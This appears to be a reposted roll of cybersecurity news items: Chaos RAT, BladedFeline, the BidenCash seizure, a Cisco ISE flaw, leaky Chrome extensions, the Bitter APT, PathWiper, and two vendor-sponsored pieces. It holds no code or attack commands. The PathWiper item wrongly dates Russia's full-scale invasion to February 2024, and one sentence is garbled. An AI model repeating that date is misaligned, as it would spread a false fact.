Author: Mark

Jun 04, 2025Ravie LakshmananLinux / Malware

Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems.

According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments.

“Chaos RAT is an open-source RAT written in Golang, offering cross-platform support for both Windows and Linux systems,” security researchers Santiago Pontiroli, Gabor Molnar, and Kirill Antonenko said in a report shared with The Hacker News.

“Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.”

While work on the “remote administration tool” started way back in 2017, it did not attract attention until December 2022, when it was put to use in a malicious campaign targeting public-facing web applications hosted on Linux systems with the XMRig cryptocurrency miner.

Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shutdown the machine, and open arbitrary URLs. The latest version of Chaos RAT is 5.0.3, which was released on May 31, 2024.

Acronis said that the Linux variants of the malware have since been detected in the wild, often in connection with cryptocurrency mining campaigns. The attack chains observed by the company show that Chaos RAT is distributed to victims via phishing emails containing malicious links or attachments.

These artifacts are designed to drop a malicious script that can modify the task scheduler “/etc/crontab” to fetch the malware periodically as a way of setting up persistence.

“Early campaigns used this technique to deliver cryptocurrency miners and Chaos RAT separately, indicating that Chaos was primarily employed for reconnaissance and information gathering on compromised devices,” the researchers said.

An analysis of a recent sample uploaded to VirusTotal in January 2025 from India with the name “NetworkAnalyzer.tar.gz,” has raised the possibility that users are being deceived into downloading the malware by masquerading it as a network troubleshooting utility for Linux environments.

Furthermore, the admin panel that allows users to build payloads and manage infected machines has been found to be susceptible to a command injection vulnerability (CVE-2024-30850, CVSS score: 8.8) that could be combined with a cross-site scripting flaw (CVE-2024-31839, CVSS score: 4.8) to execute arbitrary code on the server with elevated privileges. Both the vulnerabilities have since been addressed by Chaos RAT’s maintainer as of May 2024.

While it’s currently not clear who is behind the use of Chaos RAT in real-world attacks, the development once again illustrates how threat actors continue to weaponize open-source tools to their advantage and confuse attribution efforts.

“What starts as a developer’s tool can quickly become a threat actor’s instrument of choice,” the researchers said. “Using publicly available malware helps APT groups blend into the noise of everyday cybercrime. Open-source malware offers a ‘good enough’ toolkit that can be quickly customized and deployed. When multiple actors use the same open-source malware, it muddles the waters of attribution.”

The disclosure coincides with the emergence of a new campaign that’s targeting Trust Wallet users on desktop with counterfeit versions that are distributed via deceptive download links, phishing emails, or bundled software with the goal of harvesting browser credentials, extracting data from desktop-based wallets and browser extensions, executing commands, and acting as a clipper malware.

“Once installed, the malware can scan for wallet files, intercept clipboard data, or monitor browser sessions to capture seed phrases or private keys,” Point Wild researcher Kedar S Pandit said in a report published this week.

An Iran-aligned hacking group has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024.

The activity is tied to a threat group ESET tracks as BladedFeline, which is assessed with medium confidence to be a sub-cluster within OilRig, a known Iranian nation-state cyber actor. It’s said to be active since September 2017, when it targeted officials associated with the Kurdistan Regional Government (KRG).

“This group develops malware for maintaining and expanding access within organizations in Iraq and the KRG,” the Slovak cybersecurity company said in a technical report shared with The Hacker News.

“BladedFeline has worked consistently to maintain illicit access to Kurdish diplomatic officials, while simultaneously exploiting a regional telecommunications provider in Uzbekistan, and developing and maintaining access to officials in the government of Iraq.”

BladedFeline was first documented by ESET in May 2024 as part of its APT Activity Report Q4 2023–Q1 2024, detailing the adversary’s attack on a governmental organization from the Kurdistan region of Iraq and its targeting of the Uzbekistan telecom provider that may have been compromised as early as May 2022.

The group was discovered in 2023 following attacks aimed at Kurdish diplomatic officials with Shahmaran, a simple backdoor that checks in with a remote server and executes any operator-provided commands on the infected host to upload or download files, request specific file attributes, and provide a file and directory manipulation API.

Then last November, the cybersecurity firm said it observed the hacking crew orchestrating attacks against Iran’s neighbors, particularly regional and government entities in Iraq and diplomatic envoys from Iraq to various countries, using bespoke backdoors like Whisper (aka Veaty), Spearal, and Optimizer.

“BladedFeline has invested heavily in gathering diplomatic and financial information from Iraqi organizations, indicating that Iraq plays a large part in the strategic objectives of the Iranian government,” ESET noted in November 2024. “Additionally, governmental organizations in Azerbaijan have been another focus of BladedFeline.”

While the exact initial access vector used to get into KRG victims is unclear, it’s suspected that the threat actors likely leveraged a vulnerability in an internet-facing application to break into Iraqi government networks and deploy the Flog web shell to maintain persistent remote access.

The inner workings of the Whisper backdoor

The wide range of backdoors highlights BladedFeline’s commitment to refining its malware arsenal. Whisper is a C#/.NET backdoor that logs into a compromised webmail account on a Microsoft Exchange server and uses it to communicate with the attackers via email attachments. Spearal is a .NET backdoor that utilizes DNS tunneling for command-and-control communication.

“Optimizer is an iterative update on the Spearal backdoor. It uses the same workflow and offers the same features. The main differences between Spearal and Optimizer are largely cosmetic,” the ESET research team told The Hacker News.

Select attacks observed in December 2023 have also involved the deployment of a Python implant referred to as Slippery Snakelet that comes with limited capabilities to execute commands via “cmd.exe,” download files from an external URL, and upload files.

The backdoors notwithstanding, BladedFeline is notable for the use of various tunneling tools Laret and Pinar to maintain access to target networks. Also put to use is a malicious IIS module dubbed PrimeCache, which ESET said bears similarities to the RDAT backdoor used by OilRig APT.

A passive backdoor, PrimeCache works by keeping an eye out for incoming HTTP requests matching a predefined cookie header structure in order to process commands issued by the attacker and exfiltrate files.

It’s this aspect, coupled with the fact that two of OilRig’s tools – RDAT and a reverse shell codenamed VideoSRV – were discovered on a compromised KRG system in September 2017 and January 2018, respectively, has led to the possibility that BladedFeline may be a subgroup within OilRig, but also different from Lyceum – a moniker assigned to a different sub-cluster.

The OilRig connection is also reinforced by a September 2024 report from Check Point, which pointed fingers at the Iranian hacking group for infiltrating the networks of Iraqi government networks and infecting them with Whisper and Spearal using likely social engineering efforts.

ESET said it identified a malicious artifact named Hawking Listener that was uploaded to the VirusTotal platform in March 2024 by the same party that uploaded Flog. Hawking Listener is an early-stage implant that listens on a specified port to run commands through “cmd.exe.”

“BladedFeline is targeting the KRG and the GOI for cyber espionage purposes, with an eye toward maintaining strategic access to high-ranking officials in both governmental entities,” the company concluded.

“The KRG’s diplomatic relationship with Western nations, coupled with the oil reserves in the Kurdistan region, makes it an enticing target for Iran-aligned threat actors to spy on and potentially manipulate. In Iraq, these threat actors are most probably trying to counter the influence of Western governments following the U.S. invasion and occupation of the country.”

Jun 05, 2025Ravie LakshmananDark Web / Law Enforcement

The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of cryptocurrency funds and about 145 clearnet and dark web domains associated with an illicit carding marketplace called BidenCash.

“The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information,” the DoJ said. “BidenCash administrators charged a fee for every transaction conducted on the website.”

BidenCash launched in March 2022 to fill the void left by the shutdown of Joker’s Stash a year earlier and several other carding forums like UniCC.

Since the time it went operational, the illegal bazaar (“bidencash[.]asia,” “bidencash[.]bd,” and “bidencash[.]ws”) is estimated to have supported more than 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated no less than $17 million in revenue.

Specifically, the platform published 3.3 million individual stolen credit cards for free to promote the use of their services between October 2022 and February 2023. The stolen data contained credit card numbers, expiration dates, Card Verification Value (CVV) numbers, account holder names, addresses, email addresses, and phone numbers.

Of the 2.1 million compromised credit cards released in February 2023, 50% of the cards belonged to U.S.-based people or entities, according to Flashpoint.

BidenCash also specialized in the sale of compromised credentials that could then be purchased by other criminal actors to obtain access to computers without authorization.

In a report published in May 2023, CloudSEK revealed that BidenCash had begun to offer to advertise SSH services to buyers for as low as $2, alongside offering a package of services to check the target server for the presence of shell, as well as information about its processing power, location, and security vulnerabilities, if any.

“This poses a significant risk as threat actors can leverage this power to conduct a wide range of malicious activities, such as data exfiltration, brute force and ransomware attacks, and cryptocurrency mining,” the cybersecurity company said at the time.

However, authorities did not disclose the value of the confiscated cryptocurrency funds, or identify the operators of BidenCash and their physical locations.

The crackdown on BidenCash, according to the seizure banner, is part of an international effort led by the U.S. Secret Service and the Federal Bureau of Investigation (FBI), in partnership with the Dutch Politie, the Shadowserver Foundation, and Searchlight Cyber.

The development comes days after a multinational law enforcement operation confiscated four domains that offered counter-antivirus (CAV) and crypting services to threat actors to ensure that their malicious software stayed undetected from security software.

It also follows the arrest of a 35-year-old Ukrainian national who is alleged to have broken into more than 5,000 customer accounts at an unnamed hosting company to illicitly mine cryptocurrency on the hacked servers. The unnamed individual faces up to 15 years in prison.

The defendant is said to have used open-source intelligence to find and breach the vulnerable infrastructure of various international organizations and then deploy virtual machines to conduct unauthorized cryptojacking, resulting in $4.5 million in damages. The threat actor is believed to have been active since at least 2018.

Jun 05, 2025Ravie LakshmananNetwork Security / Vulnerability

Cisco has released security patches to address a critical security flaw impacting the Identity Services Engine (ISE) that, if successfully exploited, could allow unauthenticated actors to carry out malicious actions on susceptible systems.

The security defect, tracked as CVE-2025-20286, carries a CVSS score of 9.9 out of 10.0. It has been described as a static credential vulnerability.

“A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems,” the company said in an advisory.

The networking equipment maker, which credited Kentaro Kawane of GMO Cybersecurity for reporting the flaw, noted it’s aware of the existence of a proof-of-concept (PoC) exploit. There is no evidence that it has been maliciously exploited in the wild.

Cisco said the issue stems from the fact that credentials are improperly generated when Cisco ISE is being deployed on cloud platforms, causing different deployments to share the same credentials as long as the software release and cloud platform are the same.

Put differently, the static credentials are specific to each release and platform, but are not valid across platforms. As the company highlights, all instances of Cisco ISE release 3.1 on AWS will have the same static credentials.

However, credentials that are valid for access to a release 3.1 deployment would not be valid to access a release 3.2 deployment on the same platform. Furthermore, Release 3.2 on AWS would not have the same credentials as Release 3.2 on Azure.

Successful exploitation of the vulnerability could permit an attacker to extract the user credentials from the Cisco ISE cloud deployment and then use it to access Cisco ISE deployed in other cloud environments through unsecured ports.

This could ultimately allow unauthorized access to sensitive data, execution of limited administrative operations, changes to system configurations, or service disruptions. That said, Cisco ISE is only affected in cases where the Primary Administration node is deployed in the cloud. Primary Administration nodes that are on-premises are not impacted.

The following versions are affected –

• AWS – Cisco ISE 3.1, 3.2, 3.3, and 3.4
• Azure – Cisco ISE 3.2, 3.3, and 3.4
• OCI – Cisco ISE 3.2, 3.3, and 3.4

While there are no workarounds to address CVE-2025-20286, Cisco is recommending that users restrict traffic to authorized administrators or run the “application reset-config ise” command to reset user passwords to a new value. However, it bears noting that running the command will reset Cisco ISE to the factory configuration.

Cybersecurity researchers have flagged several popular Google Chrome extensions that have been found to transmit data in HTTP and hard-code secrets in their code, exposing users to privacy and security risks.

“Several widely used extensions […] unintentionally transmit sensitive data over simple HTTP,” Yuanjing Guo, a security researcher in the Symantec’s Security Technology and Response team, said. “By doing so, they expose browsing domains, machine IDs, operating system details, usage analytics, and even uninstall information, in plaintext.”

The fact that the network traffic is unencrypted also means that they are susceptible to adversary-in-the-middle (AitM) attacks, allowing malicious actors on the same network such as a public Wi-Fi to intercept and, even worse, modify this data, which could lead to far more serious consequences.

The list of identified extensions are below –

• SEMRush Rank (extension ID: idbhoeaiokcojcgappfigpifhpkjgmab) and PI Rank (ID: ccgdboldgdlngcgfdolahmiilojmfndl), which call the URL “rank.trellian[.]com” over plain HTTP
• Browsec VPN (ID: omghfjlpggmjjaagoclmmobgdodcjboh), which uses HTTP to call an uninstall URL at “browsec-uninstall.s3-website.eu-central-1.amazonaws[.]com” when a user attempts to uninstall the extension
• MSN New Tab (ID: lklfbkdigihjaaeamncibechhgalldgl) and MSN Homepage, Bing Search & News (ID: midiombanaceofjhodpdibeppmnamfcj), which transmit a unique machine identifier and other details over HTTP to “g.ceipmsn[.]com”
• DualSafe Password Manager & Digital Vault (ID: lgbjhdkjmpgjgcbcdlhkokkckpjmedgc), which constructs an HTTP-based URL request to “stats.itopupdate[.]com” along with information about the extension version, user’s browser language, and usage “type”

“Although credentials or passwords do not appear to be leaked, the fact that a password manager uses unencrypted requests for telemetry erodes trust in its overall security posture,” Guo said.

Symantec said it also identified another set of extensions with API keys, secrets, and tokens directly embedded in the JavaScript code, which an attacker could weaponize to craft malicious requests and carry out various malicious actions –

• Online Security & Privacy extension (ID: gomekmidlodglbbmalcneegieacbdmki), AVG Online Security (ID: nbmoafcmbajniiapeidgficgifbfmjfo), Speed Dial [FVD] – New Tab Page, 3D, Sync (ID: llaficoajjainaijghjlofdfmbjpebpa), and SellerSprite – Amazon Research Tool (ID: lnbmbgocenenhhhdojdielgnmeflbnfb), which expose a hard-coded Google Analytics 4 (GA4) API secret that an attacker could use to bombard the GA4 endpoint and corrupt metrics
• Equatio – Math Made Digital (ID: hjngolefdpdnooamgdldlkjgmdcmcjnc), which embeds a Microsoft Azure API key used for speech recognition that an attacker could use to inflate the developer’s costs or exhaust their usage limits
• Awesome Screen Recorder & Screenshot (ID: nlipoenfbbikpbjkfpfillcgkoblgpmj) and Scrolling Screenshot Tool & Screen Capture (ID: mfpiaehgjbbfednooihadalhehabhcjo), which expose the developer’s Amazon Web Services (AWS) access key used to upload screenshots to the developer’s S3 bucket
• Microsoft Editor – Spelling & Grammar Checker (ID: gpaiobkfhnonedkhhfjpmhdalgeoebfa), which exposes a telemetry key named “StatsApiKey” to log user data for analytics
• Antidote Connector (ID: lmbopdiikkamfphhgcckcjhojnokgfeo), which incorporates a third-party library called InboxSDK that contains hard-coded credentials, including API keys.
• Watch2Gether (ID: cimpffimgeipdhnhjohpbehjkcdpjolg), which exposes a Tenor GIF search API key
• Trust Wallet (ID: egjidjbpglichdcondbcbdnbeeppgdph), which exposes an API key associated with the Ramp Network, a Web3 platform that offers wallet developers a way to let users buy or sell crypto directly from the app
• TravelArrow – Your Virtual Travel Agent (ID: coplmfnphahpcknbchcehdikbdieognn), which exposes a geolocation API key when making queries to “ip-api[.]com”

Attackers who end up finding these keys could weaponize them to drive up API costs, host illegal content, send spoofed telemetry data, and mimic cryptocurrency transaction orders, some of which could see the developer’s ban getting banned.

Adding to the concern, Antidote Connector is just one of over 90 extensions that use InboxSDK, meaning the other extensions are susceptible to the same problem. The names of the other extensions were not disclosed by Symantec.

Equatio, in a statement shared with The Hacker News, said the Azure API key in question is scoped, rate-limited, and capped at a small USD-value per/month, affecting only the developer.

“This risk was logged in our ISO27001 risk-register at the time of development, and marked as “accepted” given the limited scope,” Ryan Graham, chief technology officer at Everway, said. “The feature is used by just 6 users out of 670,000 (in the last 90 days). No user data is exposed or stored, and the function is solely used by the Microsoft Edge version of the extension.”

Trust Wallet also confirmed with the publication that the API key referenced is used only for non-sensitive quote requests and cannot be used to access or expose user data. “It serves solely to identify transactions conducted by partners on Ramp’s platform,” a spokesperson for the security team said.

Ramp Network further noted that the API key used in Trust Wallet is not “secret information” and that its leakage does not affect user data confidentiality or integrity. It allows for the “identification of which partner was used by the customer to buy or sell a crypto asset,” it added.

“From GA4 analytics secrets to Azure speech keys, and from AWS S3 credentials to Google-specific tokens, each of these snippets demonstrates how a few lines of code can jeopardize an entire service,” Guo said. “The solution: never store sensitive credentials on the client side.”

Developers are recommended to switch to HTTPS whenever they send or receive data, store credentials securely in a backend server using a credentials management service, and regularly rotate secrets to further minimize risk.

The findings show how even popular extensions with hundreds of thousands of installations can suffer from trivial misconfigurations and security blunders like hard-coded credentials, leaving users’ data at risk.

“Users of these extensions should consider removing them until the developers address the insecure [HTTP] calls,” the company said. “The risk is not just theoretical; unencrypted traffic is simple to capture, and the data can be used for profiling, phishing, or other targeted attacks.”

“The overarching lesson is that a large install base or a well-known brand does not necessarily ensure best practices around encryption. Extensions should be scrutinized for the protocols they use and the data they share, to ensure users’ information remains truly safe.”

(The story was updated after publication on June 9, 2025, to include responses from Equatio and Trust Wallet.)

Jun 05, 2025Ravie LakshmananThreat Intelligence / Network Security

The threat actor known as Bitter has been assessed to be a state-backed hacking group that’s tasked with gathering intelligence that aligns with the interests of the Indian government.

That’s according to new findings jointly published by Proofpoint and Threatray in an exhaustive two-part analysis.

“Their diverse toolset shows consistent coding patterns across malware families, particularly in system information gathering and string obfuscation,” researchers Abdallah Elshinbary, Jonas Wagner, Nick Attfield, and Konstantin Klinger said.

Bitter, also known as APT-C-08, APT-Q-37, Hazy Tiger, Orange Yali, T-APT-17, and TA397, has a history of focusing primarily on South Asian entities, with select intrusions also targeting China, Saudi Arabia, and South America.

In December 2024, evidence emerged of the threat actor’s targeting of Turkey using malware families such as WmRAT and MiyaRAT, indicating a gradual geographical expansion.

Stating that Bitter frequently singles out an “exceedingly small subset of targets,” Proofpoint said the attacks are aimed at governments, diplomatic entities, and defense organizations so as to enable intelligence collection on foreign policy or current affairs.

Attack chains mounted by the group typically leverage spear-phishing emails, with the messages sent from providers like 163[.]com, 126[.]com, and ProtonMail, as well as compromised accounts associated with the governments of Pakistan, Bangladesh, and Madagascar.

The threat actor has also been observed masquerading as government and diplomatic entities from China, Madagascar, Mauritius, and South Korea in these campaigns to entice recipients into malware-laced attachments that trigger the deployment of malware.

Overview of Bitter’s infection chains

“Based on the content and the decoy documents employed, it is clear that TA397 has no qualms with masquerading as other countries’ governments, including Indian allies,” the enterprise security company said.

“While TA397’s targets in these campaigns were Turkish and Chinese entities with a presence in Europe, it signals that the group likely has knowledge and visibility into the legitimate affairs of Madagascar and Mauritius and uses the material in spearphishing operations.”

Furthermore, Bitter has been found to engage in hands-on-keyboard activity in two distinct campaigns targeting government organizations to conduct further enumeration activities on the targeted hosts and drop additional payloads like KugelBlitz and BDarkRAT, a .NET trojan that was first documented in 2019.

It features standard remote access trojan capabilities such as gathering system information, executing shell commands, downloading files, and managing files on the compromised host.

Bitter’s Malware Families

Some of the other known tools in its arsenal are below –

• ArtraDownloader, a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file
• Keylogger, a C++ module used in various campaigns to record keystrokes and clipboard content
• WSCSPL Backdoor, a backdoor that’s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files
• MuuyDownloader (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server
• Almond RAT, a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files
• ORPCBackdoor, a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions
• KiwiStealer, a stealer that searches for files matching a predefined set of extensions, are smaller than 50 MB, and have been modified within the past year, and exfiltrates them to a remote server
• KugelBlitz, a shellcode loader that’s used to deploy the Havoc C2 framework

It’s worth noting that ORPCBackdoor has been attributed by the Knownsec 404 Team to a threat actor called Mysterious Elephant, which it said overlaps with other India-aligned threat clusters, including SideWinder, Patchwork, Confucius, and Bitter.

Analysis of the hands-on-keyboards activity highlights a “Monday to Friday working hours schedule in Indian Standard Timezone (IST),” which is also consistent with the time when WHOIS domain registrations and TLS certificate issuances take place.

“TA397 is an espionage-focused threat actor that highly likely operates on behalf of an Indian intelligence organization,” the researchers said. “There is a clear indication that most infrastructure-related activity occurs during standard business hours in the IST timezone.”

Security teams face growing demands with more tools, more data, and higher expectations than ever. Boards approve large security budgets, yet still ask the same question: what is the business getting in return? CISOs respond with reports on controls and vulnerability counts – but executives want to understand risk in terms of financial exposure, operational impact, and avoiding loss.

The disconnect has become difficult to ignore. The average cost of a breach has reached $4.88 million, according to recent IBM data. That figure reflects not just incident response but also downtime, lost productivity, customer attrition, and the extended effort required to restore operations and trust. The fallout is rarely confined to security.

Security leaders need a model that brings those consequences into view before they surface. A Business Value Assessment (BVA) offers that model. It links exposures to cost, prioritization to return, and prevention to tangible value.

This article will explain how a BVA works, what it measures, and why it is becoming essential for organizations that understand that cybersecurity is a key business function, not just an IT issue.

Why Security Metrics No Longer Translate

Most security metrics were built for operational teams, not business leaders. CVE counts, patch rates and tool coverage help track progress, but they don’t answer the questions that matter to the board: What would a breach actually cost us? How much risk have we taken off the table? Where does this investment make a difference?

Traditional metrics fall short for a few key reasons:

• They show activity, not impact. Saying 3,000 vulnerabilities were fixed last quarter doesn’t explain whether any of them were tied to systems that matter. It tells you what got done – not what got safer. (if you want to learn more about this topic, check out our recent webinar on it – it’s filled with can’t-miss insights into how vanity metrics will throw off your understanding of your security posture, and what to do about it. )
• They miss how exposures connect. A single misconfiguration might look minor until it combines with an identity issue or a flat network segment. Most metrics don’t reflect how attackers chain weaknesses to reach critical assets.
• They leave out financial consequences. Breach costs aren’t one-size-fits-all. They depend on everything from detection time and data type to cloud complexity and staffing gaps – factors most dashboards never touch.

A BVA helps bridge the gap between technical findings and what the business actually needs to understand. It connects exposure data to financial impact, using breach cost modeling grounded in real-world research. Assessments should be based on inputs from sources like the IBM Cost of a Data Breach Report, which outlines factors that shape the cost of an incident – from how quickly a breach is detected to how complex the IT environment is. IBM uses those factors to analyze what a breach costs after the fact – but they can also be used to project what it could cost ahead of time, based on the organization’s actual posture.

That’s where a BVA comes in. Rather than tracking surface-level metrics, it reframes cybersecurity in terms of outcomes. It shifts the conversation. It moves from counting remediations to showing outcomes. It offers a clear picture of how exposures lead to impact, what’s at stake, and where security investments can deliver measurable value. That gives security leaders the context they need to support decisions with confidence.

The Business Value Assessment: What It Measures

It’s one thing to say a risk has been reduced. It’s another to show what that means in dollars, time, or business impact. That’s what a BVA is purpose-built to do. It connects the dots between security work and outcomes that the rest of the business actually cares about. A BVA should focus on three things:

• Cost Avoidance – What would a breach likely cost based on the risks in your environment, and how much of that can be prevented by fixing the right exposures?
• Cost Reduction – Where can security efforts help cut spending? That might include shrinking the scope of manual testing, reducing patching overhead, or improving your insurance profile by showing better risk posture.
• Efficiency Gains – How much time and effort can you save by giving your team better priorities and automating what doesn’t need a human touch?

These real-world numbers help security leaders plan better, spend smarter, and make the case when decisions or budgets are on the line.

Why Delay and Inaction Cost More Than You Think

The financial impact of a breach increases with every day of delay. Incidents involving identity-based exposures or shadow data now take over 290 days to contain. During that time, businesses experience loss of revenue, stalled operations, and prolonged reputational harm. What’s more, the IBM report shows that 70% of breaches lead to major operational disruption – many of those never fully recover.

A BVA brings clarity to that timeline. It identifies the exposures most likely to prolong an incident and estimates the cost of that delay based on both your industry and organizational profile. It also helps evaluate the return of preemptive controls. For example, IBM found that companies that deploy effective automation and AI-based remediation see breach costs drop by as much as $2.2 million.

Some organizations hesitate to act when the value isn’t clearly defined. That delay has a cost. A BVA should include a “cost of doing nothing” model that estimates the monthly loss a company takes on by leaving exposures unaddressed. We’ve found that for a large enterprise, that cost can exceed half a million dollars.

But understanding the cost of inaction is only half the battle. To truly change outcomes, security leaders need to use that understanding to guide strategy and build cross-functional support.

The Bottom Line: From Spend to Strategy, BVA Builds Alignment

There’s no question about how well security teams are doing the work. The issue is that traditional metrics don’t always show what their work means. Patch counts and tool coverage aren’t what boards care about. They want to know what’s actually being protected. A BVA helps connect the dots – showing how day-to-day security efforts help the business avoid losses, save time, and stay more resilient.

It also makes hard conversations easier. Whether it’s justifying a budget, walking the board through risk, or answering questions from insurers, a BVA gives security leaders something solid to point to. It shows where the team is making a difference – cutting down on busywork, reducing third-party testing, and improving how the organization handles risk.

And most importantly, it gets everyone on the same page. Security, IT, and finance don’t have to guess at each other’s priorities. They can work from the same numbers, focus on what really matters, and move faster when it counts.

It’s this shift that makes the real difference. Security stops being the team that says “no” and starts being the team that helps the business move forward. With a BVA, leadership finally has a clear way to see progress, make smarter decisions, and deal with risk before it turns into something bigger.

*****

Want to see what a BVA can tell you about risk in your organization? Check out the XM Cyber ROI Calculator and start understanding how to avoid losses, save time, and stay more resilient.

Note: This expert article was contributed by David Lettvin, Inside Channel Account Manager, XM Cyber.

Jun 06, 2025The Hacker NewsCyber Resilience / Penetration Testing

Cybersecurity involves both playing the good guy and the bad guy. Diving deep into advanced technologies and yet also going rogue in the Dark Web. Defining technical policies and also profiling attacker behavior. Security teams cannot be focused on just ticking boxes, they need to inhabit the attacker’s mindset.

This is where AEV comes in.

AEV (Adversarial Exposure Validation) is an advanced offense technology that mimics how adversaries will attack your system, while providing remediation strategies. It lets you discover and address how your environment can be exploited and what the impact of the exploitation could be, in a dynamic and ongoing way.

In this article, we’ll share everything you need to know about AEV, and how your team can leverage it to build continuous resilience against attacks.

What is AEV?

According to the Gartner® Market Guide for Adversarial Exposure Validation (March 2025), AEV is defined as “technologies that deliver consistent, continuous, and automated evidence of the feasibility of an attack.” AEV operates by emulating cyber-attacks, providing organizations with an understanding of how attackers can infiltrate their networks. This allows organizations to take relevant security measures to effectively remediate security gaps.

AEV technologies effectively consolidate previously isolated security testing methods, like Automated Penetration Testing and BAS (Breach and Attack Simulation). Gartner says “As the two markets developed and overlapping capabilities increased, the two functions converged to unite offensive technologies”.

AEV’s focus is on replicating an actual adversary’s mindset. By combining the breadth of automated pentesting and the impact-driven focus of BAS, AEV enables continuous testing that mirrors how real attackers adapt over time. Organizations can continuously emulate how attackers operate, providing a more insightful confirmation of vulnerabilities and how to best fix them.

How AEV Supports Exposure Management

AEV emerged as a technological solution to support CTEM (Continuous Threat Exposure Management) practices. CTEM is an all-encompassing program that helps organizations identify vulnerabilities and exposures, determine the risk profiles of digital assets, prioritize their risk mitigation, and then monitor remediation.

Here’s how AEV facilitates CTEM:

• Filtering Mechanism – Instead of generating massive lists of generic findings, AEV narrows down the vulnerabilities found to be actually exploitable. A process that confirms the legitimacy of security issues and assesses how easily they can be accessed by threat actors. This approach is far more efficient than traditional patch-everything methods as it only flags the highest-risk issues, and in the process identifies exposures that are benign and don’t actually warrant remediation.
• Continuous Nature – Rather than a one-time event or a brief engagement, AEV’s ongoing and frequent automated tests support CTEM’s continuous feedback loop of discovery, testing, and remediation. This helps to ensure a perpetual state of attack readiness even in the face of new threat techniques and as the IT environment changes and new software misconfigurations develop.
• Real Testing – Staging environments often fail to accurately represent the actual conditions in which attackers would exploit an environment. These include misconfigurations, dormant user accounts, data anomalies, and complex integrations. Some best-of-breed AEV tools address this by testing safely in production environments, making them far more accurate and effective at identifying vulnerabilities that could lead to a disastrous impact.
• Remediation Beyond Patching – Beyond just patching exploitable CVEs, AEV identifies non-patchable vulnerabilities for remediation, like replacing exposed credentials, implementing the principle of least privilege, fixing misconfigurations, replacing insecure third-party software, and more. This is aligned with CTEM’s remediation guidance, which holistically seeks to reduce exposure to potential threats and risks.

AEV for Red Teams

AEV automatically identifies how an attacker might chain together multiple vulnerabilities across different environments. This makes it a staple in any red teamer’s toolkit.

With AEV, red teams can more easily model attack scenarios. This includes complex ones like attackers hopping between cloud infrastructure and on-prem systems or pivoting through different network segments, while overcoming existing controls and combining low-scoring exposures into a full-scale breach.

Equipped with information provided by AEV, red teams gain a clear view of how a determined attacker might move laterally, allowing them to scale their efforts and fast-track mitigation. For the organization, AEV ensures cost-effective red-teaming and even allows for entry-level red-teamers to provide quality results. GenAI is expected to augment this even further by providing ideas and explanations for complex attack scenarios.

AEV for Blue Teams

For blue teamers, AEV provides a strong head start. With AEV, defenders can see in the face of an attack which protections are really robust, which require strengthening, and which controls are in fact redundant. This helps defenders ensure that their security posture is working at its best using a trending analysis to show that the program works as expected.

Blue teams can use insights and data from AEVs for:

• Detection stack tuning
• Preventive posture changes
• Exposure prioritization
• Service provider performance validation
• Security vendor performance scorecards
• Other operations or controls improvements

AEV for Security Resilience

AEV is designed to provide continuous, automated, and realistic simulations of how attackers could exploit weaknesses in an organization’s defenses. No wonder it is quickly emerging as a pivotal technology in cybersecurity. With AEV, security teams are getting that proven validation of how exposures in their environment could be exploited and to what end, enabling smarter prioritization and effective remediation at a faster pace. This necessary clarity is key to fostering cyber resilience.

To learn more about how to implement AEV, and its role within a wider CTEM practice, register to attend Xposure, Pentera’s Exposure Management Summit.

A critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, according to new findings from Cisco Talos.

“The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints,” researchers Jacob Finn, Dmytro Korzhevin, and Asheer Malhotra said in an analysis published Thursday.

The attack is assessed to be the work of a Russia-nexus advanced persistent threat (APT) actor based on the tradecraft observed and the overlapping capabilities with destructive malware used in attacks against Ukraine.

Talos said the commands issued by the administrative tool’s console were received by its client running on the victim endpoints and then executed as a batch (BAT) file.

The BAT file, in turn, consisted of a command to run a malicious Visual Basic Script (VBScript) file in the Windows TEMP folder called “uacinstall.vbs,” that was also pushed to the machines via the administrative console. The VBScript, for its part, dropped the wiper binary under the name “sha256sum.exe” in the same folder and executed it.

“Throughout the course of the attack, filenames and actions used were intended to mimic those deployed by the administrative utility’s console, indicating that the attackers had prior knowledge of the console and possibly its functionality within the victim enterprise’s environment,” Talos said.

Once launched, PathWiper is designed to gather a list of connected storage media, including physical drive names, volume names and paths, and network drive paths. The wiper then proceeds to create one thread per drive and volume for every path recorded and overwrites the contents of the artifacts with randomly generated bytes.

Specifically, it targets: Master Boot Record (MBR), $MFT, $MFTMirr, $LogFile, $Boot, $Bitmap, $TxfLog, $Tops, and $AttrDef. In addition, PathWiper irrevocably destroys files on disk by overwriting them with randomized bytes and attempts to dismount volumes.

PathWiper has been found to share some level of similarity with HermeticWiper (aka FoxBlade, KillDisk, or NEARMISS), which was detected coinciding with Russia’s full-scale military invasion of Ukraine in February 2024. The HermeticWiper malware is attributed to the Russia-linked Sandworm group.

While both wipers attempt to corrupt the MBR and NTFS-related artifacts, it bears noting that HermeticWiper and PathWiper differ in the manner the data corruption mechanism is used against identified drives and volumes.

“The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war,” the researchers said.

Silent Werewolf Targets Russia and Moldova

